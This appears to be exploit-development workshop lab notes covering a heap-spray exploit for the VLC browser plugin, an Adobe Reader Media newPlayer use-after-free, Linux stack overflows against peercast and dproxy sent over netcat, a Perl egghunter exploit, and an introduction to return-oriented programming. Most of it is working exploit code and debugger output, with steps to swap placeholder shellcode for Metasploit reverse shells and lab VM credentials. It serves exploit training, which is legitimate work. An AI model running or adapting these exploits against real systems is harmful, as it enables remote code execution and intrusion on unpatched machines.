smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

Exploit Scripts
- ffvlc

ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080

perl daemon.pl vlc0.html

ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
Browse to http://your_host_ip_address:8080/

vlc0.html
---------
<script>
   var buf = "";
   for(i = 0; i < 1250; i++)
      buf += unescape("%41%41%41%41");
   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
</script>

vlc1.html
---------
<script>

   // shellcode created in heap memory
   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");

   // 800K block of NOPS
   var nop = unescape("%u9090%u09090");   // 4 NOPS
   while(nop.length < 0xc0000) {
      nop += nop;
   }

   // spray the heap with NOP+shellcode
   var memory = new Array();
   for(i = 0; i < 50; i++) {
      memory[i] = nop + shellcode;
   }

   // build the exploit payload
   var buf = "";
   for(i = 0; i < 1250; i++)
      buf += unescape("%41%41%41%41");
   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";

   // trigger the exploit
   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
</script>

---------------------------Type This-----------------------------------

perl daemon.pl vlc1.html
-----------------------------------------------------------------------

Search for where our NOPS+shellcode lies in the heap

s 0 l fffffff 90 90 90 90 cc cc cc cc

0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
03dffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
040ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
043ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
046ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
049ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
04cffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
04fffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
052ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
055ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
058ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
05bffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
05effffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
061ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
064ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
067ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
06affffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................

Edit vlc2.html
replace %41%41%41%41 with %07%07%07%07

(928.fd0): Break instruction exception - code 80000003 (first chance)
eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
07100000 cc              int     3
0:019> u
07100000 cc              int     3
07100001 cc              int     3
07100002 cc              int     3
07100003 cc              int     3
07100004 cc              int     3
07100005 cc              int     3
07100006 cc              int     3
07100007 cc              int     3

Create vlc3.html (Copy vlc2.html to vlc3.html)
----------------------------------------------
Win32 Reverse Shell
- no restricted characters
- Encoder NONE
- use the Javascript encoded payload generated by msfweb


#######################
# Lab 4: PDF EXPLOITS #
#######################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
-----------------------------------------------------------------------

Acrobat Media newPlayer exploit
-------------------------------

Use-after-free bug

Exploit scripts are online at 172.16.0.100
- adobe_mnp

Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.


mnp0.pdf

- Open up acrobat reader
- WinDBG
- F6 attach to AcroRd32.exe
- g to Go

EIP = 41414141

Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.

mnp1.pdf

All we are doing is changing EIP to 0c0c0c0c.
There is no heap spray in this one.

This exception may be expected and handled.
eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
0c0c0c0c ??              ???

We know we get EIP control

mnp2.pdf

Put in the heap spray.

   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");

   var nops = unescape("%u9090%u9090");

   while(nops.length <= 32768)
      nops += nops;
   nops = nops.substring(0,32768 - shellcode.length);

   memory = new Array();

   for(i = 0; i < 1500; i++) {
      memory[i] = nops + shellcode;
   }

1500 NOP+shellcode blocks of 32K NOPs each

We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.

We want to see what led to the crash.

EIP is invalid, so we can't disassemble around EIP

We need to trace the function that called us and crashed.
- STACK TRACE
- Dumps all the frames from the top of the stack.
- show you the series of calls that led up to the crash.
- we will analyze the topmost function on the frame.

WinDBG - stack trace - "k" command

0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013fb34 2d843117 0x90909090
0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
0013fbdc 23825d8c EScript!PlugInMain+0x25584
0013fc74 238257e2 EScript!PlugInMain+0x249dc
0013fca4 238543c5 EScript!PlugInMain+0x24432
0013fd04 00a78de1 EScript!PlugInMain+0x53015
0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
0013fe24 00a323b4 USER32!DispatchMessageW+0xf
0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
0013ffc0 7c817067 AcroRd32+0x4004
0013fff0 00000000 kernel32!BaseProcessStart+0x23

2d843117 -- the return address that we would have returned to, if we didnt crash.
address 2d843117-2 we will have a CALL instruction.

u 2d843117
u 2d843117-2
u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
u 2d843117-4

0:000> u 2d843117-3
Multimedia!PlugInMain+0x41b66:
2d843114 ff5204          call    dword ptr [edx+4] <---- the culprit!!!
2d843117 6a00            push    0
2d843119 68d8b68c2d      push    offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
2d84311e 56              push    esi
2d84311f e842aefdff      call    Multimedia!PlugInMain+0x1c9b8 (2d81df66)
2d843124 83c40c          add     esp,0Ch
2d843127 66b80100        mov     ax,1
2d84312b 5e              pop     esi

We control EDX
edx=0c0c0c0c

call [edx+4] = call [0c0c0c10]
dd edx+4

0:000> dd edx+4
0c0c0c10  90909090 90909090 90909090 90909090
0c0c0c20  90909090 90909090 90909090 90909090

0:000> u 2d843117-7
Multimedia!PlugInMain+0x41b62:
2d843110 8b10            mov     edx,dword ptr [eax]
2d843112 8bc8            mov     ecx,eax
2d843114 ff5204          call    dword ptr [edx+4]

dd eax

0:000> dd eax
02e2d680  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
02e2d690  42424242 42424242 42424242 42424242
02e2d6a0  42424242 42424242 42424242 42424242
02e2d6b0  42424242 42424242 42424242 42424242
02e2d6c0  42424242 42424242 00000000 00000000

mnp3.pdf

change the NOPs 90909090 to 0c0c0c0c

mov edx, [eax]
call [edx+4]

edx = 0c0c0c0c
edx+4 = 0c0c0c10
contents at edx+4 will also be "0c0c0c0c"

EIP will jump to 0c0c0c0c

and...

0:000> u 0c0c0c0c
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
0c0c0c0c 0c0c            or      al,0Ch
0c0c0c0e 0c0c            or      al,0Ch
0c0c0c10 0c0c            or      al,0Ch
0c0c0c12 0c0c            or      al,0Ch
0c0c0c14 0c0c            or      al,0Ch


----------------------------------------------------------------------------------------------------------------

##################
# Linux Exploits #
##################

The target virtual machine for these labs can be downloaded from here:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
root: exploitlab
user: exploitlab
pass: exploitlab


The attack scripts can be downloaded from here:
https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
https://s3.amazonaws.com/secureninja/files/dproxy.zip
https://s3.amazonaws.com/secureninja/files/asterisk.zip


######################################
# Lab 1: Simple Linux Stack Overflow #
######################################
Login to the asterisk VM with the username/password of (exploitlab/exploitlab)

---------------------------Type This-----------------------------------

cat victim1.c
gcc victim1.c -o victim1
./victim AAAAAAAAAAAAAAAAAAA
./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


gdb -core core.xxxx
info registers
x/64x $esp
quit


/usr/local/sbin/peercast

	-open peercast1.py on the XP attack-
python peercast1.py | nc asterisk-vm-ip 7144

gdb -core core.xxxx
info registers
x/64x $esp
quit


/usr/local/sbin/peercast

	-open peercast2.py-
python peercast2.py | nc asterisk-vm-ip 7144

gdb -core core.xxxx
info registers
x/64x $esp
quit


	- SSH into the Ubuntu Host (strategicsec:strategicsec) -
cd /home/strategicsec/toolz/metasploit/tools/exploit

	Now we will run the pattern offset with ruby:

ruby pattern_offset.rb 42306142

	and

ruby pattern_offset.rb 61423161
-----------------------------------------------------------------------

	Distance to EIP is 780
	Relative position of ESP 784

Now to find a good JMP ESP address with msfelfscan

---------------------------Type This-----------------------------------

cd /home/strategicsec/toolz/metasploit/
./msfelfscan -j ESP binaries/peercast_binary
-----------------------------------------------------------------------

	0x0808fb57   jmp esp <----- we will use this one!
	0x0808fcc7   jmp esp
	0x0808ffff   jmp esp
	0x08090057   jmp esp <----- we can't use this one.
	0x080901df   jmp esp


Now open and edit peercast3.py in notepad++ on our XP Host machine.
	pad_lenth = the distance to EIP
	ret_address =  the jmp esp we are using

---------------------------Type This-----------------------------------

python peercast3.py | nc asterisk-vm-ip 7144

gdb -core core.xxxx
info registers
x/64x $eip
x/10i $eip
quit
-----------------------------------------------------------------------

Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode

	Linux IA32 Reverse Shell
	LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
	LPORT (Listening Port) – chose a port to run your listener on
	Encoder: Alpha2

---------------------------Type This-----------------------------------

nc -l -p 4321
python peercast4.py | nc asterisk-vm-ip 7144
-----------------------------------------------------------------------

##################################################################
# Lab 2: Dealing with a lack of space for your shellcode problem #
##################################################################

DPROXY EXPLOIT - DNS PROXY
--------------------------

SSH Login into your Asterisk VM as root
root / asterisk

Start dproxy
/usr/local/sbin/dproxy


DNS running on UDP port 53
we will use netcat's UDP mode (-u) for the transport.

---------------------------Type This-----------------------------------

python dproxy1.py | nc -u asterisk-vm-ip 53

GDB COMMANDS

gdb -core core.9999   -- load core files
info registers        -- inspect registers
x/64x $reg            -- examine memory at a particular register
x/64x $esp            -- examine memory at ESP
q                     -- quit
x/10i $eip            -- disassemble 10 instructions beginning at EIP

python dproxy1.py | nc -u 192.168.128.140 53

gdb -core core.8888

(gdb) info registers
-----------------------------------------------------------------------

eax            0xbf9c8c40	0xbf9c8c40
ecx            0x184f		0x184f
edx            0xbf9c7da8	0xbf9c7da8
ebx            0x41414141	0x41414141
esp            0xbf9c7c00	0xbf9c7c00
ebp            0x41414141	0x41414141
esi            0x41414141	0x41414141
edi            0xbf9c8c40	0xbf9c8c40
eip            0x41414141	0x41414141

---------------------------Type This-----------------------------------
(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbf9c7c00:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c10:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c20:	0x41414141	0x41414141	0x41414141	0x2e414141
0xbf9c7c30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c50:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c70:	0x41412e41	0x41414141	0x41414141	0x41414141
0xbf9c7c80:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7c90:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7ca0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7cb0:	0x2e414141	0x41414141	0x41414141	0x41414141
0xbf9c7cc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7cd0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7ce0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbf9c7cf0:	0x41414141	0x41412e41	0x41414141	0x41414141

PATTERN

---------------------------Type This-----------------------------------

python dproxy2.py | nc -u 192.168.128.140 53

(gdb) info registers
-----------------------------------------------------------------------

eax            0xbf9c8c40	0xbf9c8c40
ecx            0x184f		0x184f
edx            0xbf9c7da8	0xbf9c7da8
ebx            0x43377143	0x43377143
esp            0xbf9c7c00	0xbf9c7c00
ebp            0x30724339	0x30724339
esi            0x71433871	0x71433871
edi            0xbf9c8c40	0xbf9c8c40
eip            0x432e7243	0x432e7243 <------ messed up EIP

---------------------------Type This-----------------------------------

(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbf9c7c00:	0x72433272	0x34724333	0x43357243	0x72433672
0xbf9c7c10:	0x38724337	0x43397243	0x73433073	0x32734331
0xbf9c7c20:	0x43337343	0x73433473	0x36734335	0x43377343
0xbf9c7c30:	0x7343382e	0x30744339	0x43317443	0x74433274
0xbf9c7c40:	0x34744333	0x43357443	0x74433674	0x38744337
0xbf9c7c50:	0x43397443	0x75433075	0x32754331	0x43337543
0xbf9c7c60:	0x75433475	0x36754335	0x43377543	0x75433875
0xbf9c7c70:	0x30764339	0x43317643	0x76433276	0x34764333
0xbf9c7c80:	0x43357643	0x76433676	0x38764337	0x43397643
0xbf9c7c90:	0x77433077	0x32774331	0x43337743	0x77433477
0xbf9c7ca0:	0x36774335	0x4337772e	0x77433877	0x30784339
0xbf9c7cb0:	0x43317843	0x78433278	0x34784333	0x43357843
0xbf9c7cc0:	0x78433678	0x38784337	0x43397843	0x79433079
0xbf9c7cd0:	0x32794331	0x43337943	0x79433479	0x36794335
0xbf9c7ce0:	0x43377943	0x79433879	0x307a432e	0x43317a43
0xbf9c7cf0:	0x7a43327a	0x347a4333	0x43357a43	0x7a43367a

Relative position of ESP
[ESP] = 0x72433272 - 2077 bytes

We assume EIP is overwritten at 2073 bytes

dproxy3.py
- confirm that we get EIP = 42424242
- check the stack memory x/64x $esp

---------------------------Type This-----------------------------------

(gdb) info registers
-----------------------------------------------------------------------

eax            0xbf9c8c40	0xbf9c8c40
ecx            0x184f		0x184f
edx            0xbf9c7df5	0xbf9c7df5
ebx            0x41414141	0x41414141
esp            0xbf9c7c00	0xbf9c7c00
ebp            0x41414141	0x41414141
esi            0x41414141	0x41414141
edi            0xbf9c8c40	0xbf9c8c40
eip            0x42424242	0x42424242

---------------------------Type This-----------------------------------

(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbf9c7c00:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c7c10:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c7c20:	0xcccccccc	0xcccccccc	0xcccccccc	0x2ecccccc
0xbf9c7c30:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c40:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c50:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c60:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c70:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c80:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e

NEXT STEP - GET INT3

---------------------------Type This-----------------------------------

msfelfscan -j esp dproxy_binary
-----------------------------------------------------------------------

0x0804a7ca   push esp

Core was generated by `/usr/local/sbin/dproxy'.
Program terminated with signal 5, Trace/breakpoint trap.
#0  0xbf9c7c01 in ?? ()

---------------------------Type This-----------------------------------

(gdb) info registers
-----------------------------------------------------------------------

eax            0xbf9c8c40	0xbf9c8c40
ecx            0x184f	0x184f
edx            0xbf9c7df5	0xbf9c7df5
ebx            0x41414141	0x41414141
esp            0xbf9c7c00	0xbf9c7c00
ebp            0x41414141	0x41414141
esi            0x41414141	0x41414141
edi            0xbf9c8c40	0xbf9c8c40
eip            0xbf9c7c01	0xbf9c7c01

---------------------------Type This-----------------------------------

(gdb) x/64x $eip
-----------------------------------------------------------------------

0xbf9c7c01:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c7c11:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c7c21:	0xcccccccc	0xcccccccc	0xcccccccc	0x2e2ecccc
0xbf9c7c31:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c41:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c51:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c61:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c71:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e
0xbf9c7c81:	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e	0x2e2e2e2e


USING THE EGGHUNTER - DPROXY5


[AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP |  <---truncated
                                    |          |
                                   2073       ESP (2077)


[AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP ... NOP NOP 50905090 50905090 SHELLCODE ]

--------------------------------------old perl version of the code------------------------------------------------------
#   taken from Skape's paper
$linux_egghunter =
"\xBB\x90\x50\x90\x50".	# mov ebx, 0x50905090 <-- this is the EGG
"\x31\xC9". 		# xor ecx,ecx
"\xF7\xE1". 		# mul ecx
"\x66\x81\xCA\xFF\x0F".	# or dx,0xfff
"\x42".			# inc edx
"\x60".			# pusha
"\x8D\x5A\x04".		# lea ebx,[edx+0x4]
"\xB0\x21".		# mov al,0x21
"\xCD\x80".		# int 0x80
"\x3C\xF2".		# cmp al,0xf2
"\x61".			# popa
"\x74\xED".		# jz 0x9
"\x39\x1A".		# cmp [edx],ebx
"\x75\xEE".		# jnz 0xe
"\x39\x5A\x04".		# cmp [edx+0x4],ebx
"\x75\xE9".		# jnz 0xe
"\xFF\xE2";		# jmp edx

# when you need to use it, use the following EGG:
$egg = "\x50\x90\x50\x90\x50\x90\x50\x90";

$shellcode = "\xCC" x 500;

$nops = "\x90" x 100;  # 100 NOPS to place between egghunter and shellcode

$buf .= "A" x $distance_to_eip;
$buf .= pack("V", $eip);
$buf .= $linux_egghunter;
$buf .= $nops;
$buf .= $egg;
$buf .= $shellcode;
--------------------------------------old perl version of the code------------------------------------------------------


Failed to read a valid object file image from memory.
Core was generated by `/usr/local/sbin/dproxy'.
Program terminated with signal 5, Trace/breakpoint trap.
#0  0xbf9c84d1 in ?? ()

---------------------------Type This-----------------------------------

(gdb) x/64x $eip
-----------------------------------------------------------------------

0xbf9c84d1:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c84e1:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c84f1:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8501:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8511:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8521:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8531:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8541:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8551:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8561:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8571:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8581:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c8591:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c85a1:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c85b1:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xbf9c85c1:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc

REPLACE THE INT3 SHELLCODE WITH ALPHA2 ENCODED LINUX IA32 REVERSE SHELL

EXPLOIT WHICH REACHES INT3
--------------------------------------old perl version of the code------------------------------------------------------
#!/usr/bin/perl

binmode(STDOUT);

$| = 1;               # turn off output buffering

$distance_to_eip = 2073;  # replace this with distance to EIP
$eip = 0x0804a7ca;        # push esp; ret - dproxy binary

#   taken from Skape's paper
$linux_egghunter =
"\xBB\x90\x50\x90\x50".	# mov ebx, 0x50905090 <-- this is the EGG
"\x31\xC9". 		# xor ecx,ecx
"\xF7\xE1". 		# mul ecx
"\x66\x81\xCA\xFF\x0F".	# or dx,0xfff
"\x42".			# inc edx
"\x60".			# pusha
"\x8D\x5A\x04".		# lea ebx,[edx+0x4]
"\xB0\x21".		# mov al,0x21
"\xCD\x80".		# int 0x80
"\x3C\xF2".		# cmp al,0xf2
"\x61".			# popa
"\x74\xED".		# jz 0x9
"\x39\x1A".		# cmp [edx],ebx
"\x75\xEE".		# jnz 0xe
"\x39\x5A\x04".		# cmp [edx+0x4],ebx
"\x75\xE9".		# jnz 0xe
"\xFF\xE2";		# jmp edx

# when you need to use it, use the following EGG:
$egg = "\x50\x90\x50\x90\x50\x90\x50\x90";

$shellcode = "\xCC" x 500;

$nops = "\x90" x 100;  # 100 NOPS to place between egghunter and shellcode

$buf .= "A" x $distance_to_eip;
$buf .= pack("V", $eip);
$buf .= $linux_egghunter;
$buf .= $nops;
$buf .= $egg;
$buf .= $shellcode;

print $buf;
--------------------------------------old perl version of the code------------------------------------------------------


###############################################
# Introduction to Return Oriented Programming #
###############################################

---------------------------Type This-----------------------------------

victim2.c
---------
make victim2
./victim2 AAAAAAAAAAAAA

gdb victim2
disassemble main
-----------------------------------------------------------------------

   0x080483c7 <+31>:	push   0x4
   0x080483c9 <+33>:	push   0x3
   0x080483cb <+35>:	call   0x8048426 <add>

We want to set a breakpoint in main() just before add is called.
We want to inspect the calling frame for add():

break *0x080483cb

run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

We are in main()
- just before call add()
- we want to look at the stack

In GDB, you can find out the stack trace by the following commands:
where
backtrace
bt
---------------------------Type This-----------------------------------

(gdb) x/i $eip
-----------------------------------------------------------------------

=> 0x80483cb <main+35>:	call   0x8048426 <add>

---------------------------Type This-----------------------------------

(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbffffa60:	0x00000003	0x00000004	0xbffffa88	0x0804846b
                ^^^^^^^^^^params^^^^^^^^^^

stepi <------ single step
where

---------------------------Type This-----------------------------------

(gdb) where
-----------------------------------------------------------------------

#0  0x08048426 in add ()
#1  0x080483d0 in main ()

---------------------------Type This-----------------------------------

(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbffffa5c:	0x080483d0	0x00000003	0x00000004	0xbffffa88
                ^^^^^^^^^^      ^^^^^^^^^^      ^^^^^^^^^^
                saved return    param           param
                address (from
                add)

THIS IS THE CALLING FRAME FOR add(3, 4)

---------------------------Type This-----------------------------------

export EGG=`./frame1.py`
gdb victim2
(gdb) run $EGG
-----------------------------------------------------------------------

   0x80484a5 <__libc_csu_init+85>:	pop    ebx
   0x80484a6 <__libc_csu_init+86>:	pop    esi
   0x80484a7 <__libc_csu_init+87>:	pop    edi <------ POP/POP/RET
   0x80484a8 <__libc_csu_init+88>:	pop    ebp
   0x80484a9 <__libc_csu_init+89>:	ret

---------------------------Type This-----------------------------------

export EGG=`./frame2.py`
gdb victim2
run $EGG
-----------------------------------------------------------------------


x/100i 0x080483a8